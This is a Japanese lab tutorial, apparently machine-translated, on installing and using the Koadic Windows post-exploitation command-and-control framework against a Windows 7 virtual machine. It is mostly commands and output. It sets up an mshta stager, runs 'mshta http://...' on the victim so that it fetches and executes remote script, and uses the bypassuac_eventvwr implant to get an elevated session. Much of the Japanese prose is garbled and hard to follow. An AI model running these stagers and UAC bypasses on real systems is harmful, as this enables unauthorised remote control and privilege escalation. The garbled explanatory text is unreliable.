Koadicインストールと使用
アウトライン
Koadic DEFCONは主にVBScriptの通じ、ほとんどの操作のために、JScriptの、侵入ツールの後に入力している
ADOデモを開始します
環境の準備
私は2台の仮想マシンは、マシンのカーリーを攻撃する準備ができていたされた
Windows7の64ビットでの犠牲者であります
インストール
インストールは非常に簡単ですgit clone https://github.com/zerosum0x0/koadic.git
後に依存インストールしますcd koadic/
pip install -r requirements.txt
使用
ラン./koadic
.
/ \
_ _ | |
| | _____ __ _ __| || | ___
| |/ / _ \ / _` |/ _` ||.| / __|
| / (o) | (_| | (_| ||.|| (__
|_|\_\_^_/ \__,_|\__,_||:| \___|
|:|
~\==8==/~
8
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~[ Version: 0x8 ]~
~[ Stagers: 4 ]~
~[ Implants: 29 ]~
(koadic: sta/js/mshta)#
まず、このツールのいくつかの概念を知っている必要があります
- Stagersは攻撃のマシンペイロードに生成されたようなものです
- インプラントを操作すると、あなたがマシンを制御することができたときにということです
具体的なインプラントStagers、あなたはそれがgithubのページです見ることができますhttps://github.com/zerosum0x0/koadic
その後、我々は実行use stager/js/mshta
mshtaステージャーを使用することで
ポートとIP、ローカルモニタ後にマシンの設定を
設定するために、あなたがパラメータを表示するには、infoコマンドを入力することができset LHOST 192.168.1.104
set LPORT 9999
、その後、実行しますrun
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/BYhBU
[>] mshta http://192.168.1.104:9999/BYhBU
侵入ツールので、とにかくあなたは確かにあなたがコントロールするコンピュータ上でコマンドを実行することができ
、被害者のマシン上で実行されmshta http://192.168.1.104:9999/BYhBU
、私の言葉は直接CMDを開くだけで罰金を実行
して、ピットのpython文字があるでしょう、次があるでしょうこの間違いました
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('192.168.1.110', 49159)
Traceback (most recent call last):
File "/usr/lib/python2.7/SocketServer.py", line 596, in process_request_thread
self.finish_request(request, client_address)
File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request self.RequestHandlerClass(request, client_address, self) File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__ self.handle() File "/root/koadic/core/handler.py", line 90, in handle return BaseHTTPRequestHandler.handle(self) File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle self.handle_one_request() File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request method() File "/root/koadic/core/handler.py", line 169, in do_POST self.session.parse_user_info(data) File "/root/koadic/core/session.py", line 56, in parse_user_info data = data.decode().split("~~~") UnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128) ---------------------------------------- [!] Zombie 0: Timed out.
以下は、エラーであるUnicodeDecodeError: 'ascii' codec can't decode byte 0xe4 in position 65: ordinal not in range(128)
あなただけのようなUTF-8文字エンコーディング置き換え
、それを行う方法は、次のを見て
、それは最初の出口
、次のファイルを開きますvim koadic
追加
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
ファイルの合計は次のようになります
#!/usr/bin/env python
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Copyright (c) 2016 - 2017 RiskSense, Inc.
# # Licensed under the Apache License, Version 2.0 (the "License"); you may not # use the software except in compliance with the License. # # You may obtain a copy of the License at: # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations under # the License. # Disclaimer: # Usage of Koadic for attacking targets without prior mutual consent is illegal. # It is the end user's responsibility to obey all applicable local, state, # federal, and international laws. Developers assume no liability and are not # responsible for any misuse or damage caused by this program. __version_info__ = (0, 8) __version__ = "x".join(map(str, __version_info__)) __license__ = "Apache 2.0" __credits__ = ["zerosum0x0", "jmage", "TheNaterz", "aleph-naught-"] if __name__ == "__main__": import core.shell banner = open("data/banner.txt", "rb").read().decode("unicode_escape") shell = core.shell.Shell(banner, __version__) shell.run()
再度上記の操作の後にAを与えられていません
.
/ \
_ _ | |
| | _____ __ _ __| || | ___
| |/ / _ \ / _` |/ _` ||.| / __|
| / (o) | (_| | (_| ||.|| (__
|_|\_\_^_/ \__,_|\__,_||:| \___|
|:|
~\==8==/~
8
O
-{ COM Command & Control }-
Windows Post-Exploitation Tools
Endless Intellect
~[ Version: 0x8 ]~
~[ Stagers: 4 ]~
~[ Implants: 29 ]~
(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set LHOST 192.168.1.104
[+] LHOST => 192.168.1.104
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.104:9999/N435X
[>] mshta http://192.168.1.104:9999/N435X
[+] Zombie 0: Staging new connection (192.168.1.110)
[+] Zombie 0: WIN-HK90RUM6L1B\bboysoul @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版
(koadic: sta/js/mshta)#
私たちの権限昇格後UACのバイパスであります
私たちのマシンコントロールを参照するためにゾンビを入力してください
(koadic: sta/js/mshta)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
0 192.168.1.110 Alive 2017-11-25 21:27:46
Use "zombies ID" for detailed information about a session.
入力はzombies 0
、マシンの詳細を表示することができます
(koadic: sta/js/mshta)# zombies 0
ID: 0
Status: Alive
Last Seen: 2017-11-25 21:28:42
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\bboysoul
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 7 专业版
OSArch: 64-bit
Elevated: No
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key: f4d7735b8a9d45a5a74ed5a63a164421
JOB NAME STATUS ERRNO
---- --------- ------- -------
ここでは、私たちがする権利言及しなかったの上昇は全く表現を示さない見ることができます
入力してuse implant/elevate/bypassuac_eventvwr
、このモジュールで情報を見て
(koadic: imp/ele/bypassuac_eventvwr)# info
NAME VALUE REQ DESCRIPTION
----- ------------ ---- -------------
PAYLOAD yes run payloads for a list
ZOMBIE ALL yes the zombie to target
ここでは、ゾンビ番号、ペイロードとゾンビが0に設定され、ペイロードは0が使用されていないように表現される0は
、その後うまく実行
(koadic: imp/ele/bypassuac_eventvwr)# run
[*] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) created.
[+] Zombie 0: Job 16 (implant/elevate/bypassuac_eventvwr) completed.
[+] Zombie 1: Staging new connection (192.168.1.110)
[+] Zombie 1: WIN-HK90RUM6L1B\bboysoul* @ WIN-HK90RUM6L1B -- Microsoft Windows 7 专业版
成功
プログラムは、それがユーザーの存在が、それでもは言及しない権利が、ゾンビの接続が判明迂回する新しいリンク、接続が適切なユーザーをオフに言及するために実施されていることを新しいを確立し、入力されたゾンビの表情があまりないです信じていないことが、指摘リンクのうち
(koadic: imp/ele/bypassuac_eventvwr)# zombies
ID IP STATUS LAST SEEN
--- --------- ------- ------------
0 192.168.1.110 Alive 2017-11-25 21:43:00
1* 192.168.1.110 Alive 2017-11-25 21:43:00
Use "zombies ID" for detailed information about a session.
情報のゾンビ1を見てください
(koadic: imp/ele/bypassuac_eventvwr)# zombies 1
ID: 1
Status: Alive
Last Seen: 2017-11-25 21:45:35
IP: 192.168.1.110
User: WIN-HK90RUM6L1B\bboysoul*
Hostname: WIN-HK90RUM6L1B
Primary DC: Unknown
OS: Microsoft Windows 7 专业版
OSArch: 64-bit
Elevated: YES!
User Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Session Key: c42dec18786a47f2bc4ee023dc8f69bd
JOB NAME STATUS ERRNO
---- --------- ------- -------
成功に言及する権利である
、独自の研究では、我々はそれの特定のモジュールを使用することができ、すべてのモジュールで成功した移植後に右のマシンを提供します